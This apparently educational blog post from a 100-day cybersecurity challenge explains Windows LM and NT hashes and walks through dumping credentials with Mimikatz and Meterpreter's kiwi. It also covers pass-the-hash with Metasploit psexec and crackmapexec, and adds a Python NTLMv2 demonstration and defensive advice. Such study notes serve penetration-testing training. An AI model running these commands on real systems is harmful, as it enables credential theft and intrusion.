Day 22/100 of #cybertechdave100daysofcyberchallenge - Windows Password Hashes
Image by Gerd Altmann on pixabay.com

Today we learned a little bit about Windows Password Hashes. Let's jump right in.

Which hash types are used on Windows systems?

Up to Windows XP / Windows Server 2003 -> LM and NTLM (both hashes are stored for every account)

LM (LanMan) Hash:

  • Legacy hashing algorithm inherited from LAN Manager; Windows versions prior to NT 4.0 relied on it, and later versions kept storing it next to the NT hash for backward compatibility

The hashing process can be broken down into:

  1. All characters are converted to uppercase (case information is lost)
  2. The password is padded with null bytes to 14 characters (longer passwords are truncated) and split into two seven-character chunks
  3. Each chunk is used as a DES key to encrypt the fixed string "KGS!@#$%"; the two 8-byte results are concatenated into the 16-byte LM hash

  • Considered weak and easily crackable, primarily because there is no salt and because the two chunks can be attacked independently (two 7-character uppercase passwords instead of one 14-character password)
  • Brute force and rainbow table attacks are effective against it

From Windows Vista on: only NTLM; storage of the LM hash is disabled by default (a dump then shows the LM hash of an empty password, aad3b435b51404eeaad3b435b51404ee, in the LM field)

NTLM (NTHash) Hash:

  • NTLM itself is a suite of challenge-response authentication protocols; the NT hash (NTHash) is the password hash those protocols are keyed with
  • The password is encoded as UTF-16LE and hashed with MD4, without a salt

Improves upon LM in the following ways:

  • Does not split the password into two chunks
  • Case sensitive
  • Allows the use of symbols and Unicode characters
  • Caveat: it is still unsalted and MD4 is very fast to compute, so wordlist and rainbow table attacks remain practical; only password length and complexity help

Where are these password hashes stored on Windows?

  • They are stored locally in the SAM (Security Accounts Manager) database
  • Authentication and verification of user credentials is handled by the Local Security Authority (LSA), whose user-mode process is lsass.exe

This database file is responsible for managing local user accounts and their password hashes

  • All passwords are stored as hashes, never in plaintext
  • The file (%SystemRoot%\System32\config\SAM) cannot simply be copied while the OS is running
  • The Windows NT kernel keeps the SAM database file open and locked; it can still be exported with reg save or read from a Volume Shadow Copy
  • In modern Windows versions -> the hashes inside the SAM are encrypted with the syskey (boot key), which is derived from the SYSTEM hive, so an offline attacker needs both the SAM and the SYSTEM hive

Attacks typically use in-memory techniques and tools to dump SAM hashes from the LSASS process (elevated privileges are required to access and interact with LSASS: a local administrator with SeDebugPrivilege, or SYSTEM)

Now let's look at how we can dump hashes with Mimikatz.

Mimikatz is a Windows post-exploitation tool that allows the extraction of clear-text passwords, hashes and Kerberos tickets from memory

  • e.g. from the lsass.exe process
  • requires elevated privileges in order to run correctly

Again, we can use a Metasploit module after obtaining a Meterpreter shell. Importantly, we need elevated privileges (SYSTEM, or at least a local administrator). Therefore it is important to be proficient in privilege escalation.

First of all, migrate your Meterpreter session into a 64-bit SYSTEM process such as lsass.exe, mainly for compatibility (the kiwi extension must run with the same architecture as the target OS):

  • pgrep lsass
  • migrate <process_id>
  • Caveat: if the injected code crashes lsass.exe, Windows reboots the machine. Any other SYSTEM process of the right architecture (e.g. winlogon.exe or spoolsv.exe) works just as well for kiwi and is the safer choice.

Now the process to dump the hashes:

  • load the Metasploit version of Mimikatz -> load kiwi
  • dump the SAM database -> lsa_dump_sam (also prints the syskey used to decrypt the SAM)

The manual process without Metasploit goes as follows:

  • upload mimikatz.exe (either the prebuilt executable matching the target's architecture, or the C source code compiled on the target)
  • .\mimikatz.exe

Check for the required privilege:

  • privilege::debug -> must answer Privilege '20' OK (SeDebugPrivilege enabled); anything else means you are not running as an administrator

Dump hashes:

  • lsadump::sam -> the local account hashes from the SAM
  • lsadump::secrets -> the LSA secrets (e.g. service account passwords), which provide a bit more information than the SAM alone

We now have two options to proceed. Either we try to crack the hashes offline with suitable wordlists (for NT hashes that is hashcat mode 1000 or John's NT format). The other possibility is the so-called pass-the-hash attack, because we do not always need the password in plaintext to log on to another system.

What do we mean by pass-the-hash attacks?

  • An exploitation technique that involves capturing/harvesting hashes and using them directly to authenticate to the target legitimately (NTLM authentication is keyed with the NT hash, not with the password)
  • as opposed to obtaining access via service exploitation

Some of the tools to perform the attack:

  • Metasploit PsExec module
  • Crackmapexec

Attack with the Metasploit psexec module:

  • use exploit/windows/smb/psexec
  • set options: LHOST/LPORT for the payload, RHOSTS, SMBUser, SMBPass as an LM:NT hash pair (e.g. aad3b435b51404eeaad3b435b51404ee:<NT hash> when only the NT hash is known), SMBDomain for a domain account, and Target (try Native upload first; this option sometimes requires some trial and error)

Attack with crackmapexec:

  • crackmapexec smb <ip> -u <username> -H "<NTLM_hash>" -x "<command>"
  • -H takes the NT hash (or LM:NT); -x runs the command through cmd.exe, -X through PowerShell; add -d <domain> for a domain account
  • Run it without -x first: a successful logon is marked [+], and Pwn3d! means the account is a local administrator on that host
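An added example (not from the original post) of why pass-the-hash works at the protocol level: in NTLMv2 both the client's response and the server's verification are computed from the NT hash alone, never from the password. The inputs are the published MS-NLMP test vectors (user User, domain Domain, the NT hash of Password, fixed challenges, timestamp 0); the AV_PAIR list is the minimal one from those vectors, and the function names are this example's own.

```python
"""Added example (not from the original post): NTLMv2 from the NT hash only."""
import hashlib
import hmac
import struct


def ntowf_v2(nt_hash_hex: str, user: str, domain: str) -> bytes:
    """ResponseKeyNT = HMAC-MD5(NT hash, UTF-16LE(UPPER(user) + domain)).
    The key material is the dumped NT hash; the password is never needed."""
    key = bytes.fromhex(nt_hash_hex)
    return hmac.new(key, (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()


def av_pairs(nb_domain: str, nb_server: str) -> bytes:
    """Minimal TargetInfo (AV_PAIR list) as carried in the server's CHALLENGE_MESSAGE."""
    out = b""
    for av_id, value in ((2, nb_domain), (1, nb_server)):  # 2 = NbDomainName, 1 = NbComputerName
        v = value.encode("utf-16le")
        out += struct.pack("<HH", av_id, len(v)) + v
    return out + struct.pack("<HH", 0, 0)  # MsvAvEOL


def ntlmv2_response(nt_hash_hex, user, domain, server_challenge, client_challenge, timestamp, target_info):
    """Client side: returns (NTProofStr, full NTLMv2_RESPONSE blob) as in MS-NLMP 3.3.2."""
    key = ntowf_v2(nt_hash_hex, user, domain)
    temp = (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp)
            + client_challenge + b"\x00" * 4 + target_info + b"\x00" * 4)
    nt_proof = hmac.new(key, server_challenge + temp, hashlib.md5).digest()
    return nt_proof, nt_proof + temp


def lmv2_response(nt_hash_hex, user, domain, server_challenge, client_challenge):
    """LMv2 response: HMAC-MD5 over both challenges, followed by the client challenge."""
    key = ntowf_v2(nt_hash_hex, user, domain)
    return hmac.new(key, server_challenge + client_challenge, hashlib.md5).digest() + client_challenge


def server_verifies(stored_nt_hash_hex, user, domain, server_challenge, ntlmv2_blob):
    """Server/DC side: it also only holds the NT hash, so it recomputes NTProofStr
    from the blob's temp part and compares in constant time."""
    nt_proof, temp = ntlmv2_blob[:16], ntlmv2_blob[16:]
    key = ntowf_v2(stored_nt_hash_hex, user, domain)
    expected = hmac.new(key, server_challenge + temp, hashlib.md5).digest()
    return hmac.compare_digest(nt_proof, expected)


# MS-NLMP section 4.2.4 test vectors (user "User", domain "Domain", password
# "Password"); the NT hash below is what an attacker would have dumped.
DUMPED_NT_HASH = "a4f49c406510bdcab6824ee7c30fd852"
SERVER_CHALLENGE = bytes.fromhex("0123456789abcdef")
CLIENT_CHALLENGE = bytes.fromhex("aaaaaaaaaaaaaaaa")


def demo():
    """Full round trip: attacker answers the challenge with the hash, server accepts."""
    target_info = av_pairs("Domain", "Server")
    nt_proof, blob = ntlmv2_response(DUMPED_NT_HASH, "User", "Domain",
                                     SERVER_CHALLENGE, CLIENT_CHALLENGE, 0, target_info)
    accepted = server_verifies(DUMPED_NT_HASH, "User", "Domain", SERVER_CHALLENGE, blob)
    return nt_proof.hex(), accepted


if __name__ == "__main__":
    print(demo())
```

This is exactly what psexec and crackmapexec do with the value given to SMBPass or -H: they skip the MD4 step and feed the hash straight into ntowf_v2. It also explains why the defence is not a stronger password but preventing the hash from being obtained (Credential Guard, LAPS, no shared local admin passwords) and restricting NTLM where Kerberos is available.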

That's it for today. :)

#cybertechdave100daysofcyberchallenge #100daysofhacking #penetrationtesting #ine #eJPTv2

More articles by Dimitriy Volosnik